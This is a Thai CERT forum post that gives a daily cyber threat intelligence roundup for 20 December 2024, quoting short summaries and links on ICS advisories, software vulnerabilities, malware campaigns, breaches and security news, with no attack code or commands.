NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 20 December 2024

    Cyber Security News
    1
    1
    228
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย

      Healthcare Sector

      • Ossur Mobile Logic Application
        "Successful exploitation of these vulnerabilities could allow an attacker unauthorized access to sensitive information."
        https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-354-01

      Industrial Sector

      • Delta Electronics DTM Soft
        "Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code."
        https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-03
      • Siemens User Management Component
        "Successful exploitation of this vulnerability could allow an unauthenticated remote attacker arbitrary code execution."
        https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-04
      • Tibbo AggreGate Network Manager
        "Successful exploitation of this vulnerability could allow an attacker to achieve code execution on the affected device."
        https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-05
      • Hitachi Energy RTU500 Series CMU
        "Successful exploitation of this vulnerability could allow an attacker to cause a denial-of-service condition."
        https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-01
      • Hitachi Energy SDM600
        "Successful exploitation of these vulnerabilities could allow an attacker to escalate privileges and access sensitive information."
        https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-02
      • Schneider Electric Accutech Manager
        "Successful exploitation could allow an attacker to cause a crash of the Accutech Manager when receiving a specially crafted request over port 2536/TCP."
        https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-06
      • Schneider Electric Modicon Controllers
        "Successful exploitation of this vulnerability could allow an attacker to cause a victim's browser to run arbitrary JavaScript when visiting a page containing injected payload."
        https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-07

      Vulnerabilities

      • Fortinet Warns Of FortiWLM Bug Giving Hackers Admin Privileges
        "Fortinet has disclosed a critical vulnerability in Fortinet Wireless Manager (FortiWLM) that allows remote attackers to take over devices by executing unauthorized code or commands through specially crafted web requests. FortiWLM is a centralized management tool for monitoring, managing, and optimizing wireless networks. It's used by government agencies, healthcare organizations, educational institutions, and large enterprises. The flaw, tracked as CVE-2023-34990, is a relative path traversal flaw rated with a score of 9.8."
        https://www.bleepingcomputer.com/news/security/fortinet-warns-of-critical-fortiwlm-bug-giving-hackers-admin-privileges/
        https://www.darkreading.com/vulnerabilities-threats/fortinet-addresses-unpatched-critical-rce-vector
        https://thehackernews.com/2024/12/fortinet-warns-of-critical-fortiwlm.html
        https://www.securityweek.com/fortinet-patches-critical-fortiwlm-vulnerability/
        https://securityaffairs.com/172144/hacking/fortinet-warns-of-a-patched-fortiwlm-vulnerability.html
      • CISA Adds One Known Exploited Vulnerability To Catalog
        "CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
        CVE-2024-12356 BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) Command Injection Vulnerability"
        https://www.cisa.gov/news-events/alerts/2024/12/19/cisa-adds-one-known-exploited-vulnerability-catalog
      • Acrobat Out-Of-Bounds And Foxit Use-After-Free PDF Reader Vulnerabilities Found
        "Cisco Talos’ Vulnerability Research team recently disclosed three out-of-bounds read vulnerabilities in Adobe Acrobat Reader, and two use-after-free vulnerabilities in Foxit Reader. These vulnerabilities exist in Adobe Acrobat Reader and Foxit Reader, two of the most popular and feature-rich PDF readers on the market. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy. Adobe's patched this in version 24.005.20320, and Foxit's patch appears in PDF Editor version 12.1.9/11.2.12."
        https://blog.talosintelligence.com/acrobat-out-of-bounds-and-foxit-use-after-free-pdf-reader-vulnerabilities-found/
      • Exploring Vulnerable Windows Drivers
        "This post is the result of research into the real-world application of the Bring Your Own Vulnerable Driver (BYOVD) technique along with Cisco Talos’ series of posts about malicious Windows drivers. Some of this research was presented at the AVAR conference in Chennai at the beginning of December 2024. We would like to send a special thanks to Connor McGarr, Russell Sanford, Ryan Warns, Tim Harrison and Michal Poslušný for their previous work on analyzing vulnerabilities in drivers."
        https://blog.talosintelligence.com/exploring-vulnerable-windows-drivers/
      • Exploiting Trusted Systems: How Adversarial Attacks Can Manipulate EPSS
        "In an era where cyber threats are growing in both volume and sophistication, risk management has become a cornerstone of effective organizational defense. Risk management involves identifying, assessing, and prioritizing potential threats, enabling organizations to allocate their resources where they matter most. The ultimate goal is to minimize potential losses while maintaining business continuity and operational resilience."
        https://blog.morphisec.com/exploiting-trusted-systems-how-adversarial-attacks-can-manipulate-epss
        https://www.infosecurity-magazine.com/news/epss-exposed-to-adversarial-attack/

      Malware

      • Python-Based NodeStealer Version Targets Facebook Ads Manager
        "The updated version of NodeStealer, initially identified in 2023 as a JavaScript-based malware, has significantly evolved into a more sophisticated Python-based threat that’s able to extract a broader range of sensitive data from victims: This advanced variant of NodeStealer not only harvests credit card details and browser-stored information, but also targets Facebook Ads Manager accounts, siphoning critical financial and business data. Facebook Ads Manager, widely used by businesses and individuals to create, manage, and analyze advertising campaigns across various platforms including Facebook, Instagram, Messenger, and the Audience Network, has become a prime target for cybercriminals seeking to exploit sensitive personal and business-related information."
        https://www.trendmicro.com/en_us/research/24/l/python-based-nodestealer.html
      • BADBOX Botnet Is Back
        "Imagine this: you're at home, eagerly waiting for the new device you ordered from Amazon. The package arrives, you power it on, and start enjoying all the benefits of 21st century technology—unaware that, as soon as you powered it on, a scheme was unfolding within this device. Welcome to the world of BADBOX. BADBOX is a large-scale cybercriminal operation selling off-brand Android TV boxes, smartphones, and other Android electronics with preinstalled malware. What does this mean? It means the device is infected before it even reaches your hands."
        https://www.bitsight.com/blog/badbox-botnet-back
        https://www.bleepingcomputer.com/news/security/badbox-malware-botnet-infects-192-000-android-devices-despite-disruption/
      • Juniper Warns Of Mirai Botnet Targeting Session Smart Routers
        "Juniper Networks has warned customers of Mirai malware attacks targeting and infecting Session Smart routers using default credentials. As the networking infrastructure company explained, the malware scans for devices with default login credentials and executes commands remotely after gaining access, enabling a wide range of malicious activities."
        https://www.bleepingcomputer.com/news/security/juniper-warns-of-mirai-botnet-targeting-session-smart-routers/
        https://supportportal.juniper.net/s/article/2024-12-Reference-Advisory-Session-Smart-Router-Mirai-malware-found-on-systems-when-the-default-password-remains-unchanged?language=en_US
        https://therecord.media/routers-with-default-passwords-mirai-malware-juniper
        https://thehackernews.com/2024/12/juniper-warns-of-mirai-botnet-targeting.html
        https://www.securityweek.com/juniper-warns-of-mirai-botnet-targeting-session-smart-routers/
        https://securityaffairs.com/172157/malware/juniper-networks-mirai-botnet.html
      • Chinese Cyber Center Points Finger At U.S. Over Alleged Cyberattacks To Steal Trade Secrets
        "China’s national cyber incident response center accused the U.S. government of launching cyberattacks against two Chinese tech companies in a bid to steal trade secrets. In a notice Wednesday, the National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT) said a suspected U.S. intelligence agency was behind the attacks, and that CNCERT had “handled” them, according to a Google translation."
        https://cyberscoop.com/chinese-cyber-center-us-alleged-cyberattacks-trade-secrets/
      • ICS Threat Analysis: New, Experimental Malware Can Kill Engineering Processes
        "Our analysis of a public malware repository shows a constant drumbeat of OT/ICS malware. Since +20% of all OT/ICS attacks target engineering workstations, we focused on it. We saw 2 incidents with Mitsubishi engineering workstations infected with Ramnit worm. We analyzed 3 samples of new malware that kills Siemens engineering processes —we’ve named it Chaya_003."
        https://www.forescout.com/blog/ics-threat-analysis-new-experimental-malware-can-kill-engineering-processes/
        https://www.darkreading.com/vulnerabilities-threats/ot-ics-engineering-workstations-malware
        https://www.infosecurity-magazine.com/news/malware-engineering-ics/
      • Mobile Spear Phishing Targets Executive Teams
        "In an increasingly complex threat landscape, sophisticated mobile-targeted phishing campaigns continue to evolve, leveraging multiple redirection techniques and platform-specific behaviors to evade detection. Spear phishing, a highly targeted form of social engineering, is a preferred attack vector against corporate executives, specifically designed to compromise high-value credentials that grant access to sensitive enterprise data and systems."
        https://www.zimperium.com/blog/mobile-spear-phishing-targets-executive-teams/
        https://hackread.com/mobile-phishing-executives-fake-docusign-links/
      • ‘Fix It’ Social-Engineering Scheme Impersonates Several Brands
        "More and more, threat actors are leveraging the browser to deliver malware in ways that can evade detection from antivirus programs. Social engineering is a core part of these schemes and the tricks we see are sometimes very clever. Case in point, there has been an increase in attacks that involve copying a malicious command into the clipboard, only to be later pasted and executed by the victims themselves. Who would have though that copy/paste could be so dangerous?"
        https://www.malwarebytes.com/blog/news/2024/12/fix-it-social-engineering-scheme-impersonates-several-brands
      • Attackers Exploiting a Patched FortiClient EMS Vulnerability In The Wild
        "During a recent incident response, Kaspersky’s GERT team identified a set of TTPs and indicators linked to an attacker that infiltrated a company’s networks by targeting a Fortinet vulnerability for which a patch was already available. This vulnerability is an improper filtering of SQL command input making the system susceptible to an SQL injection. It specifically affects Fortinet FortiClient EMS versions 7.0.1 to 7.0.10 and 7.2.0 to 7.2.2. When successfully exploited, this vulnerability allows attackers to execute unauthorized code or commands by sending specially crafted data packets."
        https://securelist.com/patched-forticlient-ems-vulnerability-exploited-in-the-wild/115046/
      • Lazarus Group Evolves Its Infection Chain With Old And New Malware
        "Over the past few years, the Lazarus group has been distributing its malicious software by exploiting fake job opportunities targeting employees in various industries, including defense, aerospace, cryptocurrency, and other global sectors. This attack campaign is called the DeathNote campaign and is also referred to as “Operation DreamJob”. We have previously published the history of this campaign. Recently, we observed a similar attack in which the Lazarus group delivered archive files containing malicious files to at least two employees associated with the same nuclear-related organization over the course of one month."
        https://securelist.com/lazarus-new-malware/115059/
      • Counterfeit ESLint And Node 'types' Libraries Downloaded Thousands Of Times Abuse Pastebin
        "The legitimate ESLint packages on the npmjs.com registry are called "typescript-eslint" and "@typescript-eslint/eslint-plugin." This has unscrupulous actors publishing a typosquat named "@typescript_eslinter/eslint" that very closely resembles the names of the real libraries, but is up to no good. The counterfeit component has been downloaded thousands of times. Similarly, attacks impersonated another popular npm package "@types/node" with its counterfeit version having scored 6,765 weekly downloads with 20,502 downloads over the course of its lifetime."
        https://www.sonatype.com/blog/counterfeit-eslint-and-node-types-libraries-downloaded-thousands-of-times-abuse-pastebin
        https://thehackernews.com/2024/12/thousands-download-malicious-npm.html
      • Sandworm-Linked Hackers Target Users Of Ukraine’s Military App In New Spying Campaign
        "Ukrainian soldiers have become the target of a new espionage campaign linked to the notorious Russian state-sponsored threat actor Sandworm, according to a recent report. As part of the operation, the hackers create fraudulent websites that mimic the official page of a Ukrainian military app, Army+, tricking users into downloading an executable file disguised as an app installation package. Army+ has received significant attention from Ukraine’s government recently. The app, introduced earlier this year, aims to digitize bureaucratic tasks for soldiers, such as submitting reports to commanders."
        https://therecord.media/ukraine-military-app-espionage-russia-sandworm
        https://thehackernews.com/2024/12/uac-0125-abuses-cloudflare-workers-to.html
        https://securityaffairs.com/172139/apt/cert-ua-warns-russia-uac-0125-abuses-cloudflare-workers.html
      • Security Brief: Threat Actors Gift Holiday Lures To Threat Landscape
        "As the holiday season ramps up globally, threat actors have begun to take advantage of people’s desires for deals, jobs, and end of year bonuses. Proofpoint researchers have observed an increase in timely, themed content delivering malware, fraud, and credential phishing campaigns."
        https://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-gift-holiday-lures-threat-landscape

      Breaches/Hacks/Leaks

      • Play Ransomware Claims Krispy Kreme Breach, Threatens Data Leak
        "Krispy Kreme, the beloved doughnut chain, disclosed a data breach on December 11, 2024, in which its operations across the United States were disrupted. At the time, the identity of the attackers was unknown. However, Hackread.com can now exclusively reveal that the Play Ransomware group, also known as PlayCrypt, has claimed responsibility for the breach. The Play Ransomware group made the announcement earlier today, December 19, via its dark web leak site."
        https://hackread.com/play-ransomware-krispy-kreme-breach-data-leak/

      General News

      • India Sees Surge In API Attacks, Especially In Banking, Utilities
        "Cyberattacks targeting India-based organizations continue to double year-over-year, a rate far higher than the global average, highlighting the rapidly rising risk facing companies and government agencies in South Asia. Overall, organizations in India encountered nearly 1.2 billion attacks in the third quarter of 2024, up from about 600 million in the same quarter in 2023, according to a quarterly report published by Indusface, a managed application security provider. Some 377 million denial-of-service (DoS) events and 215 million bot-based requests targeted API services and Web servers utilizing the firm's Web application and API protection (WAAP) service."
        https://www.darkreading.com/cyber-risk/india-surge-api-attacks-banking-utilities
      • Are Threat Feeds Masking Your Biggest Security Blind Spot?
        "Security teams that subscribe to threat feeds get lists of known malicious domains, IPs, and file signatures that they can leverage to blacklist and prevent attacks from those sources. Using network traffic analysis that recognizes suspicious communications, data breach reports that identify attack techniques, decoys designed to draw out and study attacks, monitoring of attacker forums, and third-party data research, security experts compile threat feeds as actionable portraits of the threat landscape."
        https://www.helpnetsecurity.com/2024/12/19/threat-feeds/
      • Leadership Skills For Managing Cybersecurity During Digital Transformation
        "In this Help Net Security interview, Dan Lohrmann, CISO at Presidio, discusses the need for organizations to rethink their leadership and operational strategies and the cybersecurity risks they have to deal with during digital transformation."
        https://www.helpnetsecurity.com/2024/12/19/dan-lohrmann-presidio-digital-transformation-risks/
        Silent Heists: The Danger Of Insider Threats
        "When thinking about cybersecurity, we envision malicious actors working in dark basements, honing their tools to invent cunning new ways to breach our defenses. While this is a clear and present danger, it's also important to understand that another hazard is lurking much closer to home - the insider threat."
        https://www.tripwire.com/state-of-security/insider-threats-root-causes-mitigation-practices
      • Supply Chain Risk Mitigation Must Be a Priority In 2025
        "Israel's electronic pager attacks targeting Hezbollah in September highlighted the dangerous ramifications of a weaponized supply chain. The attacks, which leveraged remotely detonated explosives hidden inside pager batteries, injured nearly 3,000 people across Lebanon, as a worst-case reminder of the inherent risk that lies within global supply networks."
        https://www.darkreading.com/cyberattacks-data-breaches/supply-chain-risk-mitigation-priority-2025
      • $2.2 Billion Stolen From Crypto Platforms In 2024, But Hacked Volumes Stagnate Toward Year-End As DPRK Slows Activity Post-July
        "Crypto hacking remains a persistent threat, with four years in the past decade individually seeing more than a billion dollars’ worth of crypto stolen (2018, 2021, 2022, and 2023). 2024 marks the fifth year to reach this troubling milestone, highlighting how, as crypto adoption and prices rise, so too does the amount that can be stolen. In 2024, funds stolen increased by approximately 21.07% year-over-year (YoY) to $2.2 billion, and the number of individual hacking incidents increased from 282 in 2023 to 303 in 2024."
        https://www.chainalysis.com/blog/crypto-hacking-stolen-funds-2025/
        https://therecord.media/cryptocurrency-platforms-2-billion-stolen-2024-chainalysis
        https://www.helpnetsecurity.com/2024/12/19/cryptocurrency-hackers-stole-2-2-billion-from-platforms-in-2024/
        https://www.infosecurity-magazine.com/news/cryptohackers-steal-22bn-north/
        https://www.itnews.com.au/news/losses-from-crypto-hacks-jump-to-us22-billion-in-2024-614016
      • US Seeks Extradition Of Alleged LockBit Ransomware Developer From Israel
        "The United States is attempting to extradite an Israeli citizen, Rostislav Panev, who is charged with working as a software developer for the LockBit ransomware group. Panev is accused of assisting LockBit between 2019 and 2024, according to the extradition request reported by Ynet news. He was allegedly paid approximately $230,000 in bitcoin to develop tools for LockBit, including one that printed ransom notes from any printers connected to the compromised system."
        https://therecord.media/lockbit-suspect-rostislav-panev-us-seeks-extradition-israel
      • LABScon24 Replay | The Ransomware Trust Paradox
        "In his Keynote talk at LABScon 24, Max Smeets explores how ransomware operators build a unique relationship between themselves and their victims. In contrast to most other threat actors, ransomware operators rely on and leverage public visibility into their activities. Unlike APTs and other threat actors that prize stealth, ransomware gangs seek to publicize their attacks in order to convince future victims that they are trustworthy enough to deliver on their promises – providing a decryptor and deleting stolen data – if paid."
        https://www.sentinelone.com/labs/labscon24-replay-the-ransomware-trust-paradox/
      • Top 10 Industries Targeted By Threat Actors In 2024
        "As cyber threats continue to evolve, threat actors are refining their techniques and focusing on industries that hold valuable information or play critical roles in society. From ransomware attacks paralyzing operations to data breaches compromising millions of individuals, no sector is immune to cyberattacks. Drawing from recent reports and insights, this blog explores the top 10 industries targeted by cybercriminals in 2024 and the measures they can adopt to bolster their defenses."
        https://cyble.com/blog/top-10-industries-targeted-by-cybercriminals/

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) aed636bb-6bb1-4cee-b889-8f6ed8f296d3-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post